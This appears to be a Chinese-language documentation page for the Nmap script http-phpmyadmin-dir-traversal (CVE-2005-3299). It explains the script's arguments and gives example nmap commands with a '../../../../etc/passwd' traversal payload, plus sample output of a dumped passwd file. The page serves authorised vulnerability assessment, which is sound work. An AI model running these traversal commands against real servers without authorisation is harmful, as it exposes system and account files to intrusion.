指令摘要
這個指令利用了 phpMyAdmin 2.6.4-pl1(可能也適用於其他版本)中存在的探索 (traversal) 漏洞,以檢索遠端伺服器上的檔案;這個指令專門利用 phpMyAdmin 瀏覽漏洞,允許攻擊者在遠端伺服器上瀏覽檔案,即使它們本應是受保護的;攻擊者可以利用這個漏洞來獲取機敏資料或未授權存取伺服器上的檔案。
參考資料:
指令參數
http-phpmyadmin-dir-traversal.dir
這個設定項是用來指定伺服器中 phpMyAdmin 服務頁面的基礎路徑,預設情況下為 /phpMyAdmin-2.6.4-pl1/,但您可以根據伺服器的設定和實際情況來修改這個路徑,以確保指令正確運作;這個路徑是為了幫助指令定位 phpMyAdmin 服務頁面,以便進一步探索漏洞。
http-phpmyadmin-dir-traversal.file
這個設定項用於指定要檢索的遠端檔案路徑,預設情況下為 ../../../../../etc/passwd,這是一個潛在的敏感檔案路徑,用於找出伺服器的瀏覽漏洞;您可以根據需要修改這個路徑,以指定要檢索的特定遠端檔案路徑;請謹慎使用此設定,確保遵循適用的法律和倫理準則。
http-phpmyadmin-dir-traversal.outfile
Output file 這個設定項用於指定輸出檔案的位置;當執行檢測過程中,如果成功檢索了遠端檔案,該檔案的內容將被寫入到此指定的輸出檔案中;您可以指定檔案的路徑和名稱,以便保存有關檢測結果的資訊,這可以幫助您記錄和分析檢測的結果;請確保您有適當的權限來寫入指定的輸出檔案路徑。
slaxml.debug
slaxml 函式庫通常用於處理和解析 XML 資料,參閱slaxml 函式庫瞭解有關 slaxml 函式庫的詳細資訊和使用方式。
http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
這些參數包括主機位址、最大主體大小、最大暫存大小、最大通道大小、通道設定、被截斷的 HTTP 回應是否有效、以及用戶代理設定;這些設定通常用於控制和調整 HTTP 請求和回應的行為,您可以在 http 函式庫中找到有關如何使用它們資訊。
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
這些參數用於與 SMB 服務建立安全的通訊,以執行文件共享、印表機設定等操作;根據您的需求和 SMB 環境的設定,您可以設定這些參數以確保正確的 SMB 存取,以下是它們的解釋;請至 smbauth 函式庫瞭解更全面的資訊。
smbdomain (SMB 網域名稱): SMB 通訊中的網域名稱,如果 SMB 服務器位於特定網域中,則需要提供網域名稱。
smbhash (SMB 哈希): 如果已知 SMB 帳號的哈希值 (Harsh Value),則可以將其用作認證之一,這通常是在測試或測試中使用的技術。
smbnoguest (禁用 SMB Guest): 這個參數用於禁用 SMB Guest(訪客)授權,如果設定為正確,則不允許匿名存取。
smbpassword (SMB 密碼): SMB 帳戶的密碼,通常需要提供使用者名稱和密碼進行 SMB 存取。
smbtype (SMB 類型): 這是 SMB 存取的類型,通常有一些不同的協定和方法,例如 SMB1、SMB2 等;這個參數用於指定要使用的 SMB 版本或協定。
smbusername (SMB 使用者名稱): SMB 帳戶的使用者名稱,通常需要提供使用者名稱和密碼進行 SMB 存取。
vulns.short, vulns.showall
這些參數用於自動化安全性檢查中,以控制產生的漏洞報告的內容和詳細程度;可根據您的需求和應用情境,配置這些參數來選擇性地顯示或隱藏漏洞報告中的訊息;請至 vulns 函式庫中了解全部資訊。
vulns.short (簡短漏洞報告): 這個參數用於控制漏洞掃描工具產生漏洞報告的詳細程度;當設置為 "vulns.short" 時,漏洞報告可能會以簡短的格式產生,僅提供關鍵訊息,而不提供詳細的技術細節。
vulns.showall (顯示所有漏洞): 這個參數用於指示漏洞掃描工具是否應該顯示所有已檢測到的漏洞,包括:低風險和訊息性漏洞,還是僅顯示高風險漏洞;當設置為 "vulns.showall" 時,會顯示所有已檢測到的漏洞。
指令範例
nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>
Script Output指令輸出
PORT STATE SERVICE
80/tcp open http
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2005-3299
| Description:
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../../../../etc/passwd :
| root:x:0:0:root:/root:/bin/bash
| daemon:x:1:1:daemon:/usr/sbin:/bin/sh
| bin:x:2:2:bin:/bin:/bin/sh
| sys:x:3:3:sys:/dev:/bin/sh
| sync:x:4:65534:sync:/bin:/bin/sync
| games:x:5:60:games:/usr/games:/bin/sh
| man:x:6:12:man:/var/cache/man:/bin/sh
| lp:x:7:7:lp:/var/spool/lpd:/bin/sh
| mail:x:8:8:mail:/var/mail:/bin/sh
| news:x:9:9:news:/var/spool/news:/bin/sh
| uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
| proxy:x:13:13:proxy:/bin:/bin/sh
| www-data:x:33:33:www-data:/var/www:/bin/sh
| backup:x:34:34:backup:/var/backups:/bin/sh
| list:x:38:38:Mailing List Manager:/var/list:/bin/sh
| irc:x:39:39:ircd:/var/run/ircd:/bin/sh
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
| nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
| libuuid:x:100:101::/var/lib/libuuid:/bin/sh
| syslog:x:101:103::/home/syslog:/bin/false
| sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
| dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
| vboxadd:x:999:1::/var/run/vboxadd:/bin/false
| mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
| memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
| ../../../../../../../../etc/passwd saved to passwd.txt
|
| References:
作者:
Alexey Meshcheryakov
License: Same as Nmap--See https://nmap.org/book/man-legal.html
隨選即看研討會
延伸閱讀
NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和設定驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設定、網段、效能、直到網路安全評估。